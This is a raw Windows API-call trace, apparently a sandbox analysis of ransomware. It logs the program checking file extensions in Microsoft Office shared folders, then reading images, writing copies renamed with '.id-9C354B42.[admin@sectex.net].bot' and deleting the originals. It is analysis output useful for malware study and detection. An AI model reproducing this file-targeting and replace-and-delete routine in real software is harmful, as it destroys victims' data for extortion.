	[0042.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 76
	[0042.023] lstrlenW (lpString=".1cd") returned 4
	[0042.023] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1
	[0042.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 76
	[0042.024] lstrlenW (lpString=".jpg") returned 4
	[0042.024] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1
	[0042.024] lstrcmpiW (lpString1=".jpg", lpString2=".bot") returned 1
	[0042.024] lstrlenW (lpString="ShadesOfBlue.jpg") returned 16
	[0042.024] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0042.265] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=4734) returned 1
	[0042.265] CloseHandle (hObject=0x1f0) returned 1
	[0042.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg")) returned 0x20
	[0042.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.265] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0042.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 74
	[0042.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 74
	[0042.265] lstrlenW (lpString=".doc") returned 4
	[0042.265] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0042.265] lstrlenW (lpString=".docx") returned 5
	[0042.265] lstrcmpiW (lpString1=".docx", lpString2="e.jpg") returned -1
	[0042.265] lstrlenW (lpString=".pdf") returned 4
	[0042.265] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0042.265] lstrlenW (lpString=".xls") returned 4
	[0042.265] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0042.265] lstrlenW (lpString=".xlsx") returned 5
	[0042.265] lstrcmpiW (lpString1=".xlsx", lpString2="e.jpg") returned -1
	[0042.265] lstrlenW (lpString=".ppt") returned 4
	[0042.265] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0042.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 74
	[0042.265] lstrlenW (lpString=".zip") returned 4
	[0042.265] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0042.265] lstrlenW (lpString=".rar") returned 4
	[0042.265] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0042.265] lstrlenW (lpString=".bz2") returned 4
	[0042.266] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0042.266] lstrlenW (lpString=".7z") returned 3
	[0042.266] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0042.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 74
	[0042.266] lstrlenW (lpString=".dbf") returned 4
	[0042.266] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0042.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 74
	[0042.266] lstrlenW (lpString=".1cd") returned 4
	[0042.266] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0042.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 74
	[0042.266] lstrlenW (lpString=".jpg") returned 4
	[0042.266] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0042.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 74
	[0042.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 74
	[0042.266] lstrlenW (lpString=".doc") returned 4
	[0042.266] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0042.266] lstrlenW (lpString=".docx") returned 5
	[0042.266] lstrcmpiW (lpString1=".docx", lpString2="e.jpg") returned -1
	[0042.266] lstrlenW (lpString=".pdf") returned 4
	[0042.266] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0042.266] lstrlenW (lpString=".xls") returned 4
	[0042.266] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0042.266] lstrlenW (lpString=".xlsx") returned 5
	[0042.266] lstrcmpiW (lpString1=".xlsx", lpString2="e.jpg") returned -1
	[0042.266] lstrlenW (lpString=".ppt") returned 4
	[0042.266] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0042.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 74
	[0042.266] lstrlenW (lpString=".zip") returned 4
	[0042.266] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0042.266] lstrlenW (lpString=".rar") returned 4
	[0042.266] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0042.266] lstrlenW (lpString=".bz2") returned 4
	[0042.266] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0042.266] lstrlenW (lpString=".7z") returned 3
	[0042.267] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0042.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 74
	[0042.267] lstrlenW (lpString=".dbf") returned 4
	[0042.267] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0042.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 74
	[0042.267] lstrlenW (lpString=".1cd") returned 4
	[0042.267] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0042.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 74
	[0042.267] lstrlenW (lpString=".jpg") returned 4
	[0042.267] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0042.267] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0042.267] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0042.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0042.517] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=2181) returned 1
	[0042.517] CloseHandle (hObject=0x1f0) returned 1
	[0042.517] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif")) returned 0x20
	[0042.517] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.517] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0042.518] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.518] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.518] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0042.904] GetLastError () returned 0x0
	[0042.904] ReadFile (in: hFile=0x1f0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x885, lpOverlapped=0x0) returned 1
	[0042.921] WriteFile (in: hFile=0x1a0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x890, lpOverlapped=0x0) returned 1
	[0042.922] ReadFile (in: hFile=0x1f0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0042.922] WriteFile (in: hFile=0x1a0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0042.922] SetEndOfFile (hFile=0x1a0) returned 1
	[0042.922] CloseHandle (hObject=0x1a0) returned 1
	[0042.923] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.923] SetEndOfFile (hFile=0x1f0) returned 1
	[0042.923] CloseHandle (hObject=0x1f0) returned 1
	[0042.923] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0042.924] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif")) returned 1
	[0042.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74
	[0042.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74
	[0042.924] lstrlenW (lpString=".doc") returned 4
	[0042.924] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0042.924] lstrlenW (lpString=".docx") returned 5
	[0042.924] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0042.924] lstrlenW (lpString=".pdf") returned 4
	[0042.924] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0042.924] lstrlenW (lpString=".xls") returned 4
	[0042.924] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0042.924] lstrlenW (lpString=".xlsx") returned 5
	[0042.924] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0042.924] lstrlenW (lpString=".ppt") returned 4
	[0042.924] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0042.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74
	[0042.924] lstrlenW (lpString=".zip") returned 4
	[0042.924] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0042.924] lstrlenW (lpString=".rar") returned 4
	[0042.925] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0042.925] lstrlenW (lpString=".bz2") returned 4
	[0042.925] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0042.925] lstrlenW (lpString=".7z") returned 3
	[0042.925] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0042.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74
	[0042.925] lstrlenW (lpString=".dbf") returned 4
	[0042.925] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0042.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74
	[0042.925] lstrlenW (lpString=".1cd") returned 4
	[0042.925] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0042.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74
	[0042.925] lstrlenW (lpString=".jpg") returned 4
	[0042.925] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0042.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74
	[0042.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74
	[0042.925] lstrlenW (lpString=".doc") returned 4
	[0042.925] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0042.925] lstrlenW (lpString=".docx") returned 5
	[0042.925] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0042.925] lstrlenW (lpString=".pdf") returned 4
	[0042.925] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0042.925] lstrlenW (lpString=".xls") returned 4
	[0042.925] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0042.925] lstrlenW (lpString=".xlsx") returned 5
	[0042.925] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0042.925] lstrlenW (lpString=".ppt") returned 4
	[0042.925] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0042.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74
	[0042.925] lstrlenW (lpString=".zip") returned 4
	[0042.925] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0042.925] lstrlenW (lpString=".rar") returned 4
	[0042.925] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0042.926] lstrlenW (lpString=".bz2") returned 4
	[0042.926] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0042.926] lstrlenW (lpString=".7z") returned 3
	[0042.926] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0042.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74
	[0042.926] lstrlenW (lpString=".dbf") returned 4
	[0042.926] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0042.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74
	[0042.926] lstrlenW (lpString=".1cd") returned 4
	[0042.926] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0042.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74
	[0042.926] lstrlenW (lpString=".jpg") returned 4
	[0042.926] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0042.926] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0042.926] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0042.926] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0043.666] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=27407) returned 1
	[0043.666] CloseHandle (hObject=0x1f4) returned 1
	[0043.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png")) returned 0x20
	[0043.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.684] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0043.684] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.684] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.684] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0043.693] GetLastError () returned 0x0
	[0043.693] ReadFile (in: hFile=0x1f4, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x6b0f, lpOverlapped=0x0) returned 1
	[0043.695] WriteFile (in: hFile=0x204, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x6b10, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x6b10, lpOverlapped=0x0) returned 1
	[0043.696] ReadFile (in: hFile=0x1f4, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.696] WriteFile (in: hFile=0x204, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0043.696] SetEndOfFile (hFile=0x204) returned 1
	[0043.696] CloseHandle (hObject=0x204) returned 1
	[0043.696] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.696] SetEndOfFile (hFile=0x1f4) returned 1
	[0043.697] CloseHandle (hObject=0x1f4) returned 1
	[0043.697] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.698] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png")) returned 1
	[0043.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77
	[0043.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77
	[0043.698] lstrlenW (lpString=".doc") returned 4
	[0043.698] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.698] lstrlenW (lpString=".docx") returned 5
	[0043.698] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.698] lstrlenW (lpString=".pdf") returned 4
	[0043.698] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.698] lstrlenW (lpString=".xls") returned 4
	[0043.698] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.698] lstrlenW (lpString=".xlsx") returned 5
	[0043.698] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.698] lstrlenW (lpString=".ppt") returned 4
	[0043.698] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77
	[0043.698] lstrlenW (lpString=".zip") returned 4
	[0043.698] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.698] lstrlenW (lpString=".rar") returned 4
	[0043.698] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.698] lstrlenW (lpString=".bz2") returned 4
	[0043.698] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.698] lstrlenW (lpString=".7z") returned 3
	[0043.698] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77
	[0043.698] lstrlenW (lpString=".dbf") returned 4
	[0043.699] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77
	[0043.699] lstrlenW (lpString=".1cd") returned 4
	[0043.699] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77
	[0043.699] lstrlenW (lpString=".jpg") returned 4
	[0043.699] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77
	[0043.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77
	[0043.699] lstrlenW (lpString=".doc") returned 4
	[0043.699] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.699] lstrlenW (lpString=".docx") returned 5
	[0043.699] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.699] lstrlenW (lpString=".pdf") returned 4
	[0043.699] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.699] lstrlenW (lpString=".xls") returned 4
	[0043.699] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.699] lstrlenW (lpString=".xlsx") returned 5
	[0043.699] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.699] lstrlenW (lpString=".ppt") returned 4
	[0043.699] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77
	[0043.699] lstrlenW (lpString=".zip") returned 4
	[0043.699] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.699] lstrlenW (lpString=".rar") returned 4
	[0043.699] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.699] lstrlenW (lpString=".bz2") returned 4
	[0043.699] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.699] lstrlenW (lpString=".7z") returned 3
	[0043.699] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77
	[0043.699] lstrlenW (lpString=".dbf") returned 4
	[0043.699] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77
	[0043.699] lstrlenW (lpString=".1cd") returned 4
	[0043.700] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77
	[0043.700] lstrlenW (lpString=".jpg") returned 4
	[0043.700] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.700] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0043.700] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0043.700] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0043.700] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1453) returned 1
	[0043.700] CloseHandle (hObject=0x1f4) returned 1
	[0043.700] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif")) returned 0x20
	[0043.700] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.700] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0043.700] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
